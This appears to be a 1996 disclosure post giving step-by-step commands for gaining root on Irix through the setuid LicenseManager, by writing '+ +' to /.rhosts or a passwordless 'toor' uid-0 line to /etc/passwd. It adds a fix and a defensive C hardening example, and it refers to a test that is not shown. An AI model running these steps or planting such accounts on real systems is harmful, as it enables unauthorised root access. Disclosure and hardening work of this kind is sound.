Irix: root exploit for LicenseManager

Yuri Volobuev (volobuev@t1.chem.umn.edu)
Tue, 19 Nov 1996 13:30:19 -0600
   
Hi there,

For your convenience, a new, fast, reliable way to get root on your local
SGI is given below.  It works on Irix 5.3 and 6.x with
license_eoe.sw.license_eoe installed, which I believe is default (I found it
installed on several independent Irix installations).  5.2 doesn't seem to
have it.

This exploit was made possible by developers who make big, fat programs like
LicenseManager suid.

Short background:  LicenseManager is a GUI to the license subsystem.  It
allows one to install/remove/update FLEXlm and NET_LS licenses.  Any regular
user with access to the X screen can run it, and it's suid.  It will allow
anyone to install licenses, and will prompt for the root password if one
wants to remove one.  And that's about all the protection it has.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0

(in the license version field I put a space)

Apply

License(s) succesfully installed

% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +

If your system has remote root logins disabled, replacing /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful.

How to fix:

chmod -s /usr/etc/LicenseManager

Comments:

This whole thing makes me feel bad.  There are genuine exploits, there are
smart ones and lame ones.  This one is superlame.  Hacking a suid program
like LicenseManager is like stealing a milk bottle from a newborn, while the
baby's sleeping, the parents are out of town and the babysitter's in the
bathroom.

It is extremely well known that suid programs are very dangerous.  It
doesn't take a lot of knowledge to figure that a suid program that big is
vulnerable in a zillion ways (and it is, I've just shown one of many).  It's
just not suitable to be suid because it does no sanity checks whatsoever.
So why is it suid?  Somebody wanted to make the Irix GUI more user-friendly.
Really, why not allow people to install licenses without bothering to su
first?  Alas, this is a clear case where security is sacrificed in favor of
(very questionable) ease of use.  With all due disrespect, even Microsoft
doesn't do things like that so easily.

I notified SGI, but haven't heard back from them.

have fun,

yuri
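The pattern the post describes is a setuid program that takes its output file path from an environment variable and writes caller-supplied strings into it with root's privileges.  The C below is an added example, not SGI's code or anything from the original post, showing the two checks such a program needed: ignore an env-supplied path when running setuid, and open any file on the caller's behalf with the caller's real uid.  The default license path and the function names are assumptions.

```c
/* Added example (not from the original post or SGI code): the hardening
 * pattern LicenseManager lacked. A setuid program must not let the caller
 * choose its output file via the environment, and any file it does open on
 * the caller's behalf must be opened with the caller's own privileges. */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_LICENSE_FILE "/var/netls/nodelock"   /* assumed placeholder path */

/* Pick the license file. When the real and effective uids differ the program
 * is running setuid, so an env-supplied path (NETLS_LICENSE_FILE in the post)
 * is ignored and the compiled-in default is used instead.
 * Returns 1 if the env value was honoured, 0 if it was rejected or absent. */
int choose_license_path(const char *env_value, uid_t ruid, uid_t euid,
                        char *out, size_t outlen)
{
    const char *chosen = DEFAULT_LICENSE_FILE;
    int honoured = 0;
    if (env_value != NULL && env_value[0] != '\0' && ruid == euid) {
        chosen = env_value;
        honoured = 1;
    }
    snprintf(out, outlen, "%s", chosen);
    return honoured;
}

/* Open a path for appending with the *real* user's privileges: the effective
 * uid is dropped to the real uid around open(), so a path the caller could not
 * write to anyway (such as /.rhosts or /etc/passwd) is refused by the kernel.
 * O_NOFOLLOW also stops a symlink planted at the path from redirecting the
 * write. Returns the descriptor, or -1 on failure. */
int open_as_real_user(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();
    int fd;
    if (ruid != euid && seteuid(ruid) != 0)
        return -1;                       /* cannot drop privilege: refuse */
    fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0644);
    if (ruid != euid && seteuid(euid) != 0) {
        if (fd >= 0) close(fd);
        return -1;                       /* cannot restore: do not continue */
    }
    return fd;
}
```

When the program is not setuid (real uid equals effective uid) both functions behave like an ordinary unprivileged open, which is what the test below exercises.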
